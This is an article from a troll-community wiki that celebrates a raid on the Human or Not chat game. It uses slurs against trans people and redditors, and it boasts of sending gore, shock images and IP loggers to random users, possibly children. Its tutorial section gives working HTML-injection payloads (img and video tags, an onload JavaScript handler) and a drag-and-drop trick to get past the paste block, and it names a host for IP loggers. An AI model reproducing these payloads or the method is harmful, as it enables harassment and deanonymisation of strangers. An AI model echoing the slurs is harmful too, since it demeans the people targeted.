Human or Not

From Soyjak Wiki, the free ensoyclopedia
Jump to navigationJump to search

41
 Edit: Thanks for the gold kind stranger!
Really well meme'd my friend!

Human or Not was a Sharty winraid.

Reason for victory: TOTAL REDDITARD SEETHE

This raid is a gem.
Example of a conversation

Human or Not[1] is a web game where you're paired with either a random stranger or an AI chatbot and your goal is to determine whether you were chatting with a human or a robot. Given it's quite literally chatroulette, reddit trannies use it to send EPI and troonslop to random people (possibly children). The site is also coded like raisin, users can take advantage of an XSS exploit , which allows for sending images, videos, sounds and pretty much anything an HTML page can display.

On March 1, 2025, a 'teen made a thread on /soy/ about the site[2], prompting fellow 'teens to raid it. Soon after, they found out about the exploit and used it to send gemmy images/videos as well as IP loggers. On March 5th the glitch was patched.

Reaction[edit | edit source]

Shortly after the raid started, some redditors flocked to the r/humanornot subreddit to express seethe about snarky.snappy hackers posting ip loggers, trannyjaks ACKing, hitler edits and gore. It's gotten to the point where subreddit jannies had to make an announcement urging people to use VPNs and/or proxies to avoid getting hacked by le scary hackers o algo.[3]

Screenshots[edit | edit source]

Comments[edit | edit source]

How to create an HTML injection[edit | edit source]

Image uploading tutorial
DO NOT copy and paste image links from the thread, it only takes one bad actor to upload something heinous and format it in an exploit image link and post it on the thread, fooling unsuspecting 'teens into posting something terrible.

After many days of redditor seethe the xss vulnerability has now been mostly patched with a CSP policy.[4]

1. Use the file host of your preference to upload whatever gem you want to send.

2. After uploading it, copy the link and remove "https:" Your link should look like this: //files.catbox.moe/fn5hy5.png

Keep in mind human or not has a 100 character limit, so keep your link as short as possible. It is recommended to use catbox.moe for images/videos and cob.soy for IP loggers.

3. Copy the following script, replacing the string in-between brackets with your link: 

<img src&#61"[your link WITHOUT https:]">

3.1 If you wanna send a video, copy this instead 

<video src&#61"[your link WITHOUT https:]" autoplay loop>

3.2. If you wanna add some javascript code, add onload&#61'[your javascript here]' before the last &gt; For example:

Send an alert that says "Hacked by r/markiplier" 
<img src&#61"[link here]" onload&#61'alert("Hacked by r/markiplier")'>

True XSS (javascript execution on target client) is not possible because the devs added a weird (and suspicious) filter to only received messages.

The alert in the previous script only shows on the sender client but get filtered on the receiver side. After painstaking efforts I concluded that the filter is very difficult if not impossible to bypass.[5]

4. Since Human or Not doesn't allow pasting, we're gonna drag and drop our script. Paste it on your browser's address bar (do NOT hit enter)

5. When it's your turn to talk, drag and drop your script from the address bar to the chat box and send.

6. Cause seethe

The jannies at Human or Not leaked so they disabled HTML injection.

Citations

  1. https://www.humanornot.ai/
  2. https://archive.ph/eQMzD
  3. https://archive.is/veby5
  4. https://old.reddit.com/r/Humanornot/comments/1j41vpg/humanornot_security_issue_fixed/
  5. https://archive.is/BEoTY (post N°10185977, scroll down a bit)
Human or Not is part of a series on
Trolling and Raids
Visit the Soyfare portal for more.

Do we even know, who is this Snarky Snappy person or website?

Operations [-+]
Targets [-+]
Techniques [-+]
Types of raids [-+]
Trolling groups [-+]

AnonymousCIAGNAAKKKKiwi FarmsNSSrDramasoyjak.party

Retrieved from "https://soyjakwiki.org/index.php?title=Human_or_Not&oldid=256347"